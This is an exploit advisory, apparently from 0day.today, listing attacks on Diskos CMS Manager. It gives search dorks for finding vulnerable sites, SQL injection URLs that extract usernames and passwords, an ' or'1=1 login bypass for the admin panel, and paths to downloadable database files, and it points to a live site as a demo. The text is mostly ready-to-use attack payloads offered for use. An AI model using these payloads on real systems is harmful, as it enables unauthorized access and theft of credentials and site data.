Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities

================================================================
Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities
================================================================


************************************************************
**         Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
**  Prodcut:		Diskos CMS Manager  
**  Home   : 		http://www.diskos.dk
**  Vunlerability :	SQL Injection & admin byapass & database disclosure 
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovred by:	AnGeL25dZ
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**  
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
************************************************************** 
**  
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb 
** 		    artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************



#  0day.today [2018-04-04]  #